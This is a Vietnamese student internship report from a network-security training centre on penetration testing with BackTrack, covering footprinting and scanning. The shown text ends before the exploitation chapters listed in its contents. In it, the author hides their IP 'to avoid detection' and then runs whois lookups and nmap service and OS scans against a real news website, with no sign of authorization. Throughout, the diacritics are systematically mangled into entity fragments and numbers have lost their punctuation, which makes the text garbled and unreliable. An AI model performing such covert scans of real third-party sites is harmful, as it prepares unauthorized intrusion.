Caacuten bộ hướng dẫn của cơ quan đến thực tập (Kyacute vagrave ghi rotilde họ tecircn)
Ngagravey thaacuteng năm
Thủ trưởng cơ quan (Kyacute tecircn vagrave đoacuteng dấu)
iv
NHẬN XEacuteT CỦA GIAacuteO VIEcircN HƯỚNG DẪN
Ngagravey thaacuteng năm
GIAacuteO VIEcircN HƯỚNG DẪN (Kyacute vagrave ghi rotilde họ tecircn)
v
MỤC LỤC
LỜI CAacuteM ƠN ii
NHẬN XEacuteT THỰC TẬP iii
NHẬN XEacuteT CỦA GIAacuteO VIEcircN HƯỚNG DẪN iv
LỜI MỞ ĐẦU vii
CHƯƠNG 1 GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VAgrave DỰ AacuteN MẠNG 1
11 GIỚI THIỆU VỀ COcircNG TY 1
12 LỊCH SỬ HIgraveNH THAgraveNH 1
13 QUAacute TRIgraveNH PHAacuteT TRIỂN 2
14 CHỨC NĂNG VAgrave NHIỆM VỤ 3
15 CƠ CẤU TỔ CHỨC 3
16 LĨNH VỰC HOẠT ĐỘNG KINH DOANH 3
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP 4
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG 5
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN 5
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN 5
221 TỔNG QUAN VỀ BACKTRACK 5
2211 GIỚI THIỆU BACKTRACK 5
2212 LỊCH SỬ PHAacuteT TRIỂN 6
2213 MỤC ĐIacuteCH 6
222 FOOTPRINTING 7
223 CAacuteC KIỂU FOOTPRINTING 8
2231 PASSIVE FOOTPRINTING 8
2232 ACTIVE FOOTPRING 13
224 SCANING 13
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH 14
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING 14
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG 20
2251 LỖI MS08_067 20
2252 LỖI MS10_090 26
2253 LỖI MS12_004 34
2254 LỖI MS12_027 43
vi
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET 52
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ VPS 59
2257 XAcircM NHẬP WINDOWS 8 TỪ VPS 65
CHƯƠNG 3 NHẬN XEacuteT- ĐAacuteNH GIAacute 69
31 ƯU ĐIỂM 69
32 KHUYẾT ĐIỂM 69
33 KẾT LUẬN 69
vii
LỜI MỞ ĐẦU
Trong thời đại ngagravey nay vai trograve của Cocircng nghệ Thocircng tin (CNTT) vagrave Internet ngagravey
cagraveng vocirc cugraveng quan trọng Điều nagravey keacuteo theo phần lớn caacutec ngagravenh kinh tế phụ thuộc vagraveo
maacutey vi tiacutenh Chiacutenh vigrave vậy nhiều yacute đồ phaacute hoại đatilde nhắm vagraveo hệ thống nagravey vagrave cũng
khocircng loại trừ khả năng đối thủ cạnh tranh nhau do đoacute để bảo đảm maacutey tiacutenh hoạt động
trơn tru liecircn tục đogravei hỏi hệ thống phải trang bị những cocircng cụ những biện phaacutep phograveng
thủ những hệ thống cảnh baacuteo bảo mật cao nhằm chống lại những tin tặc (hacker)
Chuacuteng ta biết rằng hacker coacute 2 loại hacker mũ đen vagrave hacker mũ trắng Hacker mũ đen
lagrave những tay tinh quaacutei vagrave thocircng minh vocirc cugraveng họ khocircng chỉ giỏi về khả năng lập trigravenh
magrave cograven giỏi về cả mạng giao thức mạng họ coacute thể lợi dụng những lỗi nhỏ nhất từ đoacute
khai thaacutec vagrave tấn cocircng hệ thống maacutey chủ gacircy thiệt hại lớn nếu đoacute lagrave 1 doanh nghiệp lớn
1 tập đoagraven lớn hay ngacircn hagravenghellip Thật nguy hiểm nếu như toagraven bộ thocircng tin tagravei khoản
ngacircn hagraveng của khaacutech hagraveng loạt vagraveo tay hacker cũng như những dự aacuten kế hoạch của
tập đoagraven hay của doanh nghiệp Quả thật thiệt hại do hacker gacircy ra quaacute lớn ảnh hưởng
nghiecircm trọng đến người dugraveng maacutey tiacutenh Vigrave vậy nhằm chống lại những hacker mũ đen
những hacker mũ trắng khocircng ngừng nacircng cao kiến thức cũng như sự nhạy beacuten cẩn
thận tư duy saacuteng tạo khocircng ngừng nhằm ngăn chặn bảo vệ người dugraveng maacutey tiacutenh tạo
nơi người dugraveng sự tin cậy cũng như những thocircng tin tagravei khoản kế hoạch dự aacuten của họ
sẽ hoagraven toagraven được bảo mật an toagraven tuyệt đối Do đoacute vai trograve an ninh mạng thật sự thiết
thực cũng giống như 1 đất nước nếu khocircng coacute lực lượng cocircng an cảnh saacutet quacircn đội thigrave
hậu quả magrave người dacircn phải gaacutenh chịu thật nghiecircm trọng vagrave chắc chắn đất nước đoacute sẽ
khocircng bao giờ phaacutet triển kịp theo thời đại kỹ thuật số hiện nay
Nội dung baacuteo caacuteo gồm 3 chương chiacutenh
Chương 1 Giới thiệu chung đơn vị thực tập vagrave dự aacuten mạng
Chương 2 Thực trạng quaacute trigravenh thực hiện dự aacuten mạng
Chương 3 Nhận xeacutet đaacutenh giaacute thực trạng
1
CHƯƠNG 1 GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VAgrave DỰ AacuteN
MẠNG
11 GIỚI THIỆU VỀ COcircNG TY
Trung Tacircm Đagraveo Tạo Mạng vagrave Quản Trị Mạng Quốc Tế ATHENA tiền thacircn lagrave Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng (tecircn thương hiệu viết tắt lagrave TRUNG
TAcircM ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
Tecircn cocircng ty viết bằng tiếng nước ngoagravei ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED
12 LỊCH SỬ HIgraveNH THAgraveNH
Năm 2000 một nhoacutem caacutec thagravenh viecircn lagrave những doanh nhacircn tagravei năng vagrave thagravenh cocircng trong
lĩnh vực cocircng nghệ thocircng tin đatilde nhận ra tiềm năng phaacutet triển của việc đagraveo tạo nền cocircng
nghệ thocircng tin nước nhagrave Họ lagrave những caacute nhacircn coacute trigravenh độ chuyecircn mocircn cao vagrave coacute đầu oacutec
latildenh đạo cugraveng với tầm nhigraven vagrave về tương lai của ngagravenh cocircng nghệ thocircng tin họ đatilde quy tụ
được một lực lượng lớn đội ngũ cocircng nghệ thocircng tin trước hết lagrave lagravem nhiệm vụ ứng cứu
maacutey tiacutenh cho caacutec doanh nghiệp caacute nhacircn coacute nhu cầu Bước phaacutet triển tiếp theo lagrave vươn tầm
đagraveo tạo đội ngũ caacuten bộ cocircng nghệ thocircng tin cho đất nước vagrave xatilde hội
Caacutec thagravenh viecircn saacuteng lập bao gồm
Ocircng Nguyễn Thế Đocircng Cựu giaacutem đốc trung tacircm ứng cứu Athena hiện tại lagrave giaacutem đốc
dự aacuten cocircng ty Siemen Telecom
Ocircng Hứa Văn Thế Phuacutec Phoacute Giaacutem Đốc Phaacutet triển Thương Mại Cocircng ty EIS Phoacute
Tổng Cocircng ty FPT
Ocircng Nghiecircm Sỹ Thắng Phoacute Tổng Giaacutem Đốc Ngacircn hagraveng Liecircn Việt chịu traacutech nhiệm
cocircng nghệ thocircng tin của ngacircn hagraveng
Ocircng Votilde Đỗ Thắng hiện lagrave Giaacutem Đốc Trung tacircm đagraveo tạo quản trị vagrave an ninh mạng
Athena
Đến năm 2003 bốn thagravenh viecircn saacuteng lập cugraveng với đội ngũ ứng cứu maacutey tiacutenh gần 100 thagravenh
viecircn hoạt động như lagrave một nhoacutem một tổ chức ứng cứu maacutey tiacutenh miền Nam Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng hay cograven gọi lagrave Trung tacircm đagraveo tạo
Quản trị vagrave An ninh mạng Quốc Tế Athena (tecircn thương hiệu viết tắt lagrave TRUNG TAcircM
ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
2
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
13 QUAacute TRIgraveNH PHAacuteT TRIỂN
Từ năm 2004 - 2006 Trung tacircm coacute nhiều bước phaacutet triển vagrave chuyển migravenh Trung tacircm trở
thagravenh một trong những địa chỉ đaacuteng tin cậy của nhiều doanh nghiệp nhằm cagravei đặt hệ thống
an ninh vagrave đagraveo tạo cho đội ngũ nhacircn viecircn caacutec doanh nghiệp về caacutec chương trigravenh quản lyacute
dự aacuten MS Project 2003 kỹ năng thương mại điện tử vagrave bảo mật webvagrave lagrave địa chỉ đaacuteng
tin cậy của nhiều học sinh sinh viecircn đến đăng kyacute học Đogravei hỏi cấp thiết trong thời gian
nagravey của trung tacircm lagrave nacircng cao hơn nữa đội ngũ giảng viecircn cũng như cơ sở để đaacutep ứng
nhu cầu ngagravey cagraveng cao về cocircng nghệ thocircng tin của đất nước noacutei chung doanh nghiệp caacute
nhacircn noacutei riecircng
Đến năm 2006 Trung tacircm đagraveo tạo vagrave quản trị mạng Athena mở ra một chi nhaacutenh tại cư xaacute
Nguyễn Văn Trỗi Đồng thời tiếp tục tuyển dụng đội ngũ giảng viecircn lagrave những chuyecircn gia
an ninh mạng tốt nghiệp caacutec trường đại học vagrave học viện cocircng nghệ thocircng tin uy tiacuten trecircn
toagraven quốc đồng thời trong thơi gian nagravey Athena coacute nhiều chiacutenh saacutech ưu đatildei nhằm thu huacutet
đội ngũ nhacircn lực cocircng nghệ thocircng tin lagravenh nghề từ caacutec tổ chức doanh nghiệp nhằm lagravem
giagraveu thecircm đội ngũ của trung tacircm
Đến năm 2008 Hagraveng loạt caacutec trung tacircm đagraveo tạo quản trị vagrave an ninh mạng mọc lecircn cugraveng
với khủng hoảng kinh tế tagravei chiacutenh toagraven cầu đatilde lagravem cho Trung tacircm gặp nhiều khoacute khăn
Ocircng Nguyễn Thế Đocircng cugraveng ocircng Hứa Văn Thế Phuacutec ruacutet vocircn khỏi cocircng ty gacircy necircn sự
hoang man cho toagraven bộ hệ thống của trung tacircm cộng thecircm hoạt động tại chi nhaacutenh
Nguyễn Văn Trỗi khocircng cograven hiệu quả phải đoacuteng cửa lagravem cho trung tacircm rơi từ khoacute khăn
nagravey đến khoacute khăn khaacutec
Luacutec nagravey với quyết tacircm khocirci phục lại cocircng ty cũng như tiếp tục sứ mạng goacutep phần vagraveo
tiến trigravenh tin học hoacutea đất nước Ocircng Votilde Đỗ Thắng mua lại cổ phần của hai nhagrave đầu tư lecircn
lagravem giaacutem đốc vagrave xacircy dựng lại trung tacircm mở ra một lagraven gioacute mới vagrave giai đoạn mới cugraveng
với quyết tacircm mạnh mẽ vagrave tinh thần theacutep đatilde giuacutep ocircng vượt qua nhiều khoacute khăn ban đầu
giuacutep trung tacircm đứng vững trong thời kỳ khủng hoảng
Từ năm 2009 - nay Cugraveng với sự latildenh đạo tagravei tigravenh vagrave đầu oacutec chiến lược trung tacircm dần
được phục hồi vagrave trở lại quỹ đạo hoạt động của migravenh Đến nay trung tacircm đatilde trở thagravenh
một trong những trung tacircm đagraveo tạo quản trị mạng hagraveng đầu Việt Nam Cugraveng với sự liecircn
kết rất nhiều cocircng ty vagrave doanh nghiệp trung tacircm trở thagravenh nơi đagraveo tạo vagrave cung cấp nguồn
3
nhacircn lực cocircng nghệ thocircng tin cho xatilde hội Từng bước thực hiện mục tiecircu goacutep phần vagraveo tiến
trigravenh tin học hoacutea nước nhagrave
14 CHỨC NĂNG VAgrave NHIỆM VỤ
Trung tacircm ATHENA lagrave nơi đagraveo tạo phaacutet triển nguồn nhacircn lực cocircng nghệ thocircng tin nước
nhagrave lagrave nơi magrave bất cứ ai yecircu thiacutech vagrave đam cocircng nghệ thocircng tin phaacutet triển kỹ năng nghề
nghiệp tương lai đồng thời ATHENA cũng lagrave nơi bồi dưỡng những kỹ năng cũng như trao
đổi kinh nghiệm thực tế qua những những chương trigravenh đagraveo tạo ngắn hạn miễn phiacute với
mọi người ngoagravei ra ATHENA cograven coacute những khoacutea học dagravei hạn nhằm bổ sung củng cố
kiến thức cho sinh viecircn học sinh hay cho người đatilde đi lagravem muốn nacircng cao thecircm tay nghề
của migravenh
15 CƠ CẤU TỔ CHỨC
16 LĨNH VỰC HOẠT ĐỘNG KINH DOANH
Trung tacircm ATHENA đatilde vagrave đang tập trung chủ yếu vagraveo đagraveo tạo chuyecircn sacircu quản trị
mạng an ninh mạng thương mại điện tử theo caacutec tiecircu chuẩn quốc tế của caacutec hatildeng nổi
tiếng như Microsoft Cisco Oracle Linux LPI CEH Song song đoacute trung tacircm
ATHENA cograven coacute những chương trigravenh đagraveo tạo cao cấp dagravenh riecircng theo đơn đặt hagraveng
của caacutec đơn vị như Bộ Quốc Phograveng Bộ Cocircng An ngacircn hagraveng doanh nghiệp caacutec cơ
quan chiacutenh phủ tổ chức tagravei chiacutenh
4
Sau gần 10 năm hoạt động nhiều học viecircn tốt nghiệp trung tacircm ATHENA đatilde lagrave chuyecircn gia
đảm nhận cocircng taacutec quản lyacute hệ thống mạng an ninh mạng cho nhiều bộ ngagravenh như Cục
Cocircng Nghệ Thocircng Tin - Bộ Quốc Phograveng Bộ Cocircng An Sở Thocircng Tin Truyền Thocircng caacutec
tỉnh bưu điện caacutec tỉnh
Ngoagravei chương trigravenh đagraveo tạo Trung tacircm ATHENA cograven coacute nhiều chương trigravenh hợp taacutec
vagrave trao đổi cocircng nghệ với nhiều đại học lớn như đại học Baacutech Khoa Thagravenh Phố Hồ
Chiacutenh Minh Học Viện An Ninh Nhacircn Dacircn( Thủ Đức) Học Viện Bưu Chiacutenh Viễn
Thocircng Hiệp hội an toagraven thocircng tin (VNISA) Viện Kỹ Thuật Quacircn Sự
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP
- Nghiecircn cứu vagrave hướng dẫn sử dụng caacutec chức năng backtrack để kiểm tra an ninh
mạng
Tigravem hiểu caacutec cocircng cụ thu thập thocircng tin
Tigravem hiểu caacutec cocircng cụ Target Discovery
Tigravem hiểu caacutec cocircng cụ scan lỗi
Tigravem hiểu caacutec cocircng cụ Enumeration
Tigravem hiểu caacutec cocircng cụ exploit
Tigravem hiểu caacutec cocircng cụ Privilege Escalation
Tigravem hiểu caacutec cocircng cụ Maintaining Access
- Caacutec bước cần chuẩn bị
Hệ điều hagravenh BackTrack windows XPwindows 7windows 8
Phần mềm VMware
VPS
Hệ thống mạng Internet
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN
- Ngagravey 0710 Nhận đề tagravei thực tập Xaacutec định caacutec bước thực hiện Quay clip
giới thiệu
- Ngagravey 0910 Tigravem hiểu vagrave cagravei đặt BackTrack
- Ngagravey 1110 Tigravem hiểu caacutec sản phẩm của Athena Tigravem hiểu caacutech thức phaacutet
hiện lỗi bằng Backtrack
- Ngagravey 1410 Tigravem hiểu scan hệ thống
- Ngagravey 1610 Cagravei đặt Nessus queacutet thocircng tin maacutey XP Tigravem hiểu nmap-scripts
- Ngagravey 1810 Tigravem hiểu lỗ hổng ms08_067
- Ngagravey 2110 Tigravem hiểu lỗ hổng ms10_090
- Ngagravey 2410 Tigravem hiểu lỗ hổng ms12_004
- Ngagravey 2610 Tigravem hiểu lỗ hổng ms12_027
- Ngagravey 2810 Tigravem hiểu lỗ hổng ms12_020
- Ngagravey 3010 Tigravem hiểu về cocircng cụ Metasploit trong BackTrack
- Ngagravey 0311 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms08_067
bằng Metasploit( httpswwwyoutubecomwatchv=m3M33vEqg4s)
- Ngagravey 0511 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms10_090
bằng Metasploit( httpswwwyoutubecomwatchv=fUygw4tjDOI)
- Ngagravey 0811 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_004
bằng Metasploit( httpswwwyoutubecomwatchv=hPmPqKC2zaM)
- Ngagravey 1111 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_027
bằng Metasploit( httpswwwyoutubecomwatchv=BDVLpPF_NOg)
- Ngagravey 2511 Tigravem hiểu về VPS Honeypot
- Ngagravey 2911 Cagravei đặt Metasploit trecircn VPS Xacircm nhập windows 8 từ VPS
(Cagravei đặt httpswwwyoutubecomwatchv=pkEn79kQ4CI)
(Xacircm nhập windows 8 httpswwwyoutubecomwatchv=0DtgzfdPl8A)
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN
221 Tổng quan về BackTrack
2211 Giới thiệu Backtrack
Backtrack lagrave một hệ điều hagravenh phaacutet triển trecircn nhacircn Linux đồng thời cũng lagrave bộ sưu tập caacutec
cocircng cụ kiểm tra đaacutenh giaacute mức độ an ninh của hệ thống mạng một caacutech toagraven diện Backtrack
trở thagravenh một cocircng cụ khocircng thể thiếu với những ai muốn tigravem hiểu nghiecircn cứu vagrave khaacutem phaacute
thế giới bảo mật
6
Nguồn tải httpwwwbacktrack-linuxorgdownloads
2212 Lịch sử phaacutet triển
Backtrack lagrave một bản phacircn phối dạng Live DVD của Linux được phaacutet triển để thử nghiệm
thacircm nhập Trong caacutec định dạng Live DVD bạn sử dụng coacute thể Backtrack trực tiếp từ đĩa
DVD magrave khocircng cần cagravei noacute vagraveo maacutey của bạn Backtrack cũng coacute thể được cagravei đặt vagraveo ổ
cứng vagrave sử dụng như một hệ điều hagravenh Backtrack lagrave sự hợp nhất giữa 3 bản phacircn phối
khaacutec nhau của Linux về thacircm nhập thử nghiệm -IWHAX WHOPPIX vagrave Auditor Trong
phiecircn bản hiện tại của noacute (40) Backtrack được dựa trecircn phiecircn bản phacircn phối Linux Ubuntu
810 Tiacutenh đến ngagravey 19 thaacuteng bảy năm 2010 Backtrack 4 đatilde được tải về của hơn 15 triệu
người sử dụng Backtrack dagravenh cho tất cả mọi người từ caacutec chuyecircn gia trong lĩnh vực bảo
mật tới những người mới bước vagraveo lĩnh vực an toagraven thocircng tin vagrave bạn coacute thể dễ dagraveng tigravem vagrave
cập nhật cơ sở dữ liệu một caacutech nhanh nhất về bộ sưu tập caacutec cocircng cụ bảo mật Cộng đồng
phaacutet triển lecircn Backtrack bao gồm từ những người coacute kiến thức sacircu vagrave kinh nghiệm trong lĩnh
vực an toagraven thocircng tin tới từ caacutec cơ quan chiacutenh phủ trong lĩnh vực cocircng nghệ thocircng tin
hoặc những người đam mecirc về bảo mật đến caacutec caacute nhacircn mới gia nhập vagraveo cộng đồng bảo
mật Hiện nay Backtrack đatilde phaacutet triển đến phiecircn bản mới nhất lagrave Backtrack6 (hay cograven gọi lagrave
Kali Linux)
2213 Mục điacutech
Backtrack chứa một số cocircng cụ coacute thể được sử dụng trong quaacute trigravenh thử nghiệm thacircm nhập
của bạn Caacutec cocircng cụ kiểm tra thacircm nhập trong Backtrack coacute thể được phacircn loại như sau
- Information gathering loại nagravey coacute chứa một số cocircng cụ coacute thể được sử dụng để coacute
được thocircng tin liecircn quan đến một mục tiecircu DNS định tuyến địa chỉ e-mail trang web
maacutey chủ mail Thocircng tin nagravey được thu thập từ caacutec thocircng tin coacute sẵn trecircn Internet magrave
khocircng cần chạm vagraveo mocirci trường mục tiecircu
- Network mapping loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để kiểm tra caacutec
host đang tồn tại thocircng tin về OS ứng dụng được sử dụng bởi mục tiecircu vagrave cũng
lagravem portscanning
- Vulnerability identification Trong thể loại nagravey bạn coacute thể tigravem thấy caacutec cocircng cụ để
queacutet caacutec lỗ hổng (tổng hợp) vagrave trong caacutec thiết bị Cisco Noacute cũng chứa caacutec cocircng cụ để
thực hiện vagrave phacircn tiacutech Server Message Block (SMB) vagrave Simple Network
Management Protocol (SNMP)
7
- Web application analysis loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng trong theo
dotildei giaacutem saacutet caacutec ứng dụng web
- Radio network analysis Để kiểm tra mạng khocircng dacircy bluetooth vagrave nhận dạng tần
số vocirc tuyến (RFID) bạn coacute thể sử dụng caacutec cocircng cụ trong thể loại nagravey
- Penetration loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để khai thaacutec caacutec lỗ hổng
tigravem thấy trong caacutec maacutey tiacutenh mục tiecircu
- Privilege escalation Sau khi khai thaacutec caacutec lỗ hổng vagrave được truy cập vagraveo caacutec maacutey
tiacutenh mục tiecircu bạn coacute thể sử dụng caacutec cocircng cụ trong loại nagravey để nacircng cao đặc quyền
của bạn cho caacutec đặc quyền cao nhất
- Maintaining access Cocircng cụ trong loại nagravey sẽ coacute thể giuacutep bạn trong việc duy trigrave
quyền truy cập vagraveo caacutec maacutey tiacutenh mục tiecircu Bạn coacute thể cần để coacute được những
đặc quyền cao nhất trước khi caacutec bạn coacute thể cagravei đặt cocircng cụ để duy trigrave quyền truy
cập
- Voice Over IP (VOIP) Để phacircn tiacutech VOIP bạn coacute thể sử dụng caacutec cocircng cụ trong thể
loại nagravey
Backtrack cũng coacute những tool sử dụng cho
- Digital forensics Trong loại nagravey bạn coacute thể tigravem thấy một số cocircng cụ coacute thể được sử
dụng để lagravem phacircn tiacutech kỹ thuật như coacute được higravenh ảnh đĩa cứng cấu truacutec caacutec tập
tin vagrave phacircn tiacutech higravenh ảnh đĩa cứng Để sử dụng caacutec cocircng cụ cung cấp trong thể loại
nagravey bạn coacute thể chọn Start Backtrack Forensics trong trigravenh đơn khởi động Đocirci khi
sẽ đogravei hỏi bạn phải gắn kết nội bộ đĩa cứng vagrave caacutec tập tin trao đổi trong chế độ chỉ
đọc để bảo tồn tiacutenh toagraven vẹn
- Reverse engineering Thể loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để gỡ rối
chương trigravenh một hoặc thaacuteo rời một tập tin thực thi
222 Footprinting lagrave gigrave
Footprinting lagrave 1 trong 3 quaacute trigravenh đầu tiecircn magrave hacker sẽ tiến hagravenh nhằm thu thập
thocircng tin của mục tiecircu thocircng qua caacutec cơ sở dữ liệu cocircng khai như caacutec thocircng tin về tecircn
miền của tổ chức danh bạn điện thọai caacutec trang vagraveng doanh nghiệp để tigravem kiếm địa
chỉ số điện thọai địa chỉ email của caacutec bộ phận vv Đacircy lagrave bước rất quan trọng vagrave
caacutec attacker thường dagravenh ra đến 90 thời gian để tiến hagravenh thu thập thocircng tin cograven quaacute
trigravenh tấn cocircng chỉ diễn ra trong 10 trong toagraven bộ quaacute trigravenh Điều nagravey cũng giống như
bước chuẩn bị khi chuacuteng ta cần tiến hagravenh triển khai một cocircng việc nagraveo đoacute trong quaacute trigravenh
8
kinh doanh hay phaacutet triển yacute tưởng mới Thocircng tin cagraveng nhiều thigrave cơ hội tấn cocircng thagravenh
cocircng cagraveng cao Để tiến hagravenh thu thập thocircng tin một caacutech khoa học caacutec hackerattacker
cần thực hiện theo một sơ đồ như sau
1 Tigravem kiếm từ caacutec nguồn thocircng tin
2 Xaacutec định caacutec datildey địa chỉ mạng
3 Xaacutec định caacutec maacutey cograven họat động
4 Tigravem kiếm những port mở (open port) hay điểm truy cập của mục tiecircu (access point)
5 Dograve tigravem hệ điều hagravenh của mục tiecircu
6 Tigravem kiếm caacutec dịch vụ đang họat động trecircn những port mở
7 Lập mocirc higravenh mạng
Thocircng tin tigravem kiếm cần thiết như
1 Network Informations Domain Network blocks IP TCP hay UDP System
Enumeration ACLs IDSes vv
2 System Informations OS user and group name system name kiến truacutec system SNMP
Routing
3 Organziation Informations Tecircn cocircng ty nhacircn viecircn websites địa chỉ số điện thoại
Email liecircn lạc caacutec kiến thức liecircn quan đến tigravenh higravenh kinh doanh của cocircng ty
Trong quaacute trigravenh nagravey Hacker chủ yếu dugraveng caacutec phương tiện thocircng tin cocircng cộng như baacuteo
chiacute internet để tigravem hiểu caacutec thocircng tin hợp phaacutep về mục tiecircu necircn footprinting hầu như khocircng
thể phaacutet hiện vigrave đacircy lagrave hagravenh động hợp phaacutep
223 CAacuteC KIỂU FOOTPRINTING
2231 Passive Footprinting
Passive footprinting lagrave higravenh thức tiềm kiếm thocircng tin thocircng qua bagravei baacuteo trang web những
website hỗ trợ tigravem kiếm như wwwgooglecom wwwtenmienvn
wwwwhoisdomaintoolscom wwwarcchiveorg httpcentralopsnetco
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang webwwwtenmienvn
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
